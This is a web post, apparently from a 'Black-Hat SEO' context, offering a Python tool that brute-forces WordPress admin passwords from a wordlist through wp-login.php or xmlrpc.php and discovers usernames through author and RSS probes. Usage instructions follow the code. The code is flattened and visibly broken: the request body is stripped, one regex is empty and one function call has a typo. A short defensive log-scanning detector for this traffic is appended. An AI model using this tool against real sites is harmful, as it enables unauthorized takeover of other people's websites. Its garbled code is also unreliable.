Black-Hat SEO

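WordPress batch brute-force tool

  1. Operated through command-line parameters.

  2. Two brute-force methods: either simulating a login request to wp-login, or POSTing a data packet to xmlrpc.php.

  3. Automatic username discovery, using two methods: /?author=1 and RSS. Because there are so many WP themes and too few matching regular expressions, the results can be inaccurate. Tried together with a Baidu crawler, the accuracy was 70%.

  4. Create pass.txt in the same directory and the password run can start.

  The code is as follows: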

  #!/usr/bin/env python#coding:utf-8__author__=’mtfly’import requestsimport stringimport timeimport refrom optparse import OptionParserdef crack_xmlrpc(username, password, url): crack_url=url + “/xmlrpc.php” #print crack_url post=”’ wp.getUsersBlogs ”’ + username + ”’ ”’ + password + ”’ ”’ headers={ ‘UserAgent’: ‘Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)’, ‘Referer’: crack_url } try: res=requests.post(url=crack_url, data=post, headers=headers, timeout=5).content #print “ok” except Exception, e: print “error”, e else: if ‘405‘ in res: print “XML-RPC has been disabled. Please use the wp-admin.php” elif “faultCode” in res: print “The password is not:”, password elif “isAdmin” in res: print “/nThe password is “, password exit()def crack_wp_login(username, password, url): crack_url=url + “/wp-login.php” #print crack_url headers={ ‘UserAgent’: ‘Mozilla/5.0 wordperss批量爆破工具 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)’, ‘Content-Type’: ‘application/x-www-form-urlencoded’ } post={‘log’: username, ‘pwd’: password} try: res=requests.post(url=crack_url, data=post, headers=headers, timeout=5).content except Exception, e: print “error”, e else: if ‘lostpassword’ in res: print “The password is not:”, password elif “welcome-panel” in res: print “/nThe password is “, password exit()def get_author(url): get_url0=url + “/?feed=rss2” get_url1=url + “/?author=1” headers={ ‘UserAgent’: ‘Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)’ } #print get_url try: res0=requests.get(get_url0) res1=requests.get(get_url1) html0=res0.content html1=res1.content s0=re.findall(‘‘,html0) s1=re.findall(‘(.*?)/s’,html1) if len(s1)==0: # print “null” # print res.url s1=re.findall(‘author/(.*?)/’, res1.url) s=s0 +s1 print “The Username maybe:” for i in list(set(s)): print i except Exception, e: print e p=OptionParser()p.add_option(‘-u’, ‘–url’, type=”string”, help=’Input the url’)p.add_option(‘-a’, ‘–admin’,default=”admin”, 
type=”string”, help=’Input the username’)p.add_option(‘-g’, ‘–getauthor’,default=False, action=”store_true”, help=’Get admin/’username’)p.add_option(‘-w’, ‘–crack_wp_login’,default=False, action=”store_true”, help=’Crack by wp-login’)p.add_option(‘-x’, ‘–crack_xmlrpc’,default=False, action=”store_true”, help=’Crack by xmlrpc’)options, args=p.parse_args()url=options.url admin=options.admin author=options.getauthor w=options.crack_wp_login x=options.crack_xmlrpc# url=”http://mtfly.net”# url=”http://127.0.0.1/wp/”print urlif author: get_author(url) exit()f=open(“pass.txt”, “r”)for line in f: #print line.strip() if w: crack_wp_login(admin, line.strip(), url) if x: crack_xmlrpr(admin, line.strip(), url)f.close

  Create pass.txt and add test passwords to it.

  -u is followed by the WP URL; remember to include http://

  -a is followed by the username; the default is admin

  -g automatically determines the administrator username; accuracy is fairly low. The tool exits automatically after obtaining the username.

  -w uses /wp-login.php to simulate the admin web-page login

  -x uses the /xmlrpc.php interface, logging in via POST
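A defender's view of the traffic described above, as an added example (not code from the original post): it scans web-server access logs for repeated POSTs to /wp-login.php or /xmlrpc.php from one client and for /?author=N username probes. The combined log format, the sample log lines and the thresholds (more than 5 login POSTs within 60 seconds) are assumptions made for the illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined-log-format fields we need: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")   # the two endpoints the post names
AUTHOR_ENUM = re.compile(r"[?&]author=\d+")      # the /?author=1 username probe

def detect(lines, max_posts=5, window=timedelta(seconds=60)):
    """Return {ip: set(findings)}; max_posts and window are assumed thresholds."""
    recent = defaultdict(deque)      # ip -> timestamps of recent login POSTs
    findings = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                 # skip lines that are not in the expected format
        ip, method = m["ip"], m["method"]
        path, _, query = m["path"].partition("?")
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if method == "GET" and AUTHOR_ENUM.search("?" + query):
            findings[ip].add("author-enumeration")
        if method == "POST" and path.endswith(LOGIN_PATHS):
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:    # drop POSTs older than the window
                q.popleft()
            if len(q) > max_posts:
                findings[ip].add("login-flood:" + path.rsplit("/", 1)[-1])
    return dict(findings)

def _line(ip, sec, method, path, status):    # builds one constructed log line
    return (f'{ip} - - [10/Oct/2021:13:55:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "-"')

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE = (
    [_line("203.0.113.7", 0, "GET", "/?author=1", 301)]
    + [_line("203.0.113.7", s, "POST", "/wp/xmlrpc.php", 200) for s in range(1, 9)]
    + [_line("198.51.100.4", 10, "POST", "/wp-login.php", 302)]   # one normal login
    + [_line("198.51.100.4", 11, "GET", "/?feed=rss2", 200)]
)

if __name__ == "__main__":
    for ip, found in detect(SAMPLE).items():
        print(ip, sorted(found))
```

A single login POST or an ordinary feed request, as from the second client in the sample, produces no finding; only the client that probes the author archive and then floods xmlrpc.php is reported.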